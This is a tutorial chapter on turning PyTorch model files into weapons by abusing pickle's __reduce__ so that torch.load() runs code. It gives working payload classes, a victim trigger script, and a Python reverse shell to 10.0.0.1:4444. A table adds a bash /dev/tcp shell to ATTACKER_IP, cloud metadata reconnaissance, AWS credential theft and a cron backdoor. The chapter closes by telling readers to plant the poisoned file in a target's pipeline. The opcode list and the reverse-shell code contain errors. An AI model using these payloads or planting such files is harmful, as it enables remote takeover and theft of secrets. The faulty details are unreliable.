The convenience of sharing pretrained models introduces a significant security risk. PyTorch’s default serialization method, Python’s pickle module, is not secure against maliciously crafted files. Loading a compromised model file with torch.load() can lead to arbitrary code execution on the victim’s machine. This chapter details how to create and leverage this vulnerability.
The Core Vulnerability: `pickle` and Arbitrary Code Execution
At its heart, this attack vector has little to do with neural networks and everything to do with object serialization. The pickle module can serialize almost any Python object into a byte stream. To reconstruct complex objects, it can be instructed to call arbitrary functions.
The mechanism for this is the __reduce__ magic method. When an object with a custom __reduce__ method is unpickled, the Python interpreter executes the function returned by it. An attacker can define a class with a malicious __reduce__ method, pickle an instance of it, and save it as a .pt or .pth file. When a victim uses torch.load() on this file, the payload executes.
Crafting a Malicious Payload
Creating a weaponized PyTorch file is straightforward. You don’t need a valid model; you only need to create a Python object that executes your desired command during deserialization.
Step 1: Define the Malicious Class
The payload is a simple Python class that uses __reduce__ to point to a dangerous function, such as os.system.
import os
import pickle
import torch
class MaliciousPayload:
def __reduce__(self):
# This method is called during unpickling.
# It returns a tuple: (callable, (arguments...))
# Here, we instruct pickle to call os.system with a command.
command = 'echo "Arbitrary Code Execution Successful" > pwned.txt'
return (os.system, (command,))
# Instantiate the malicious object
payload_instance = MaliciousPayload()
Step 2: Serialize with `torch.save()`
Next, you serialize this object using torch.save(), which wraps pickle. The file extension is typically .pth or .pt to appear as a legitimate model checkpoint.
# Serialize the object into a file named like a model checkpoint
torch.save(payload_instance, 'malicious_model.pth')
print("Malicious model file 'malicious_model.pth' created.")
The Victim’s Side: Triggering the Exploit
The attack is triggered the moment a user or an MLOps pipeline attempts to load the file using the standard torch.load() function. No further interaction is required.
import torch
import os
# Victim script - this is all it takes.
print("Attempting to load the model...")
# The payload executes here, during the load operation.
model_data = torch.load('malicious_model.pth')
print("Model loaded.")
# Check if the attack worked
if os.path.exists('pwned.txt'):
print("Attack successful: 'pwned.txt' file created.")
When this script runs, the os.system command from the payload is executed before torch.load() even returns a value. The victim’s script may crash or continue, but the damage is already done.
Anatomy of the Malicious Pickle Stream
Understanding the pickle bytecode helps in both crafting and detecting these attacks. The serialized stream contains opcodes that instruct the Pickle Virtual Machine. A malicious payload often contains a specific sequence.
The key opcodes to look for are:
c: Imports a module and gets an attribute from it (e.g., `c os system`).R(REDUCE): Pushes the callable and its arguments onto the stack and executes it.o(GLOBAL): Pushes a global object (like a module and function name) to the stack.
Static analysis tools like picklescan operate by scanning the raw byte stream for these dangerous sequences without actually deserializing the file.
Advanced Payloads and Red Team Scenarios
Simple commands are effective for demonstrations, but real-world attacks require more sophisticated payloads. The goal is often persistence, data exfiltration, or lateral movement, not just creating a file.
| Attack Scenario | Payload Example (Conceptual) | Objective |
|---|---|---|
| Reverse Shell | os.system("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1") |
Gain interactive shell access to the victim machine. |
| Credential Theft | A Python script that reads ~/.aws/credentials or environment variables and sends them to a C2 server. |
Exfiltrate cloud credentials or other sensitive secrets. |
| Internal Reconnaissance | os.system("curl -s http://METADATA_IP/...") |
Query cloud metadata services to understand the environment. |
| Persistent Backdoor | A script that downloads and executes a second-stage payload, then adds itself to cron or a startup service. | Maintain long-term access to the compromised system. |
Example: Reverse Shell Payload
A reverse shell is a common objective. The payload connects back to an attacker-controlled machine, providing shell access. The following demonstrates how to embed this into the __reduce__ method.
import os
import socket
import subprocess
import torch
class ReverseShellPayload:
def __reduce__(self):
# A more robust reverse shell using subprocess
attacker_ip = '10.0.0.1' # Attacker's listening IP
attacker_port = '4444' # Attacker's listening port
# The command to be executed
cmd = f"python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("{attacker_ip}",{attacker_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'"
return (subprocess.run, (cmd,), {'shell': True})
# Save the payload
torch.save(ReverseShellPayload(), 'reverse_shell_model.pth')
print("Reverse shell payload created.")
As a red teamer, your task is to place this reverse_shell_model.pth file where a target’s automated pipeline or a developer will load it. This is the essence of a supply chain attack: poison the artifact, then wait for it to be consumed.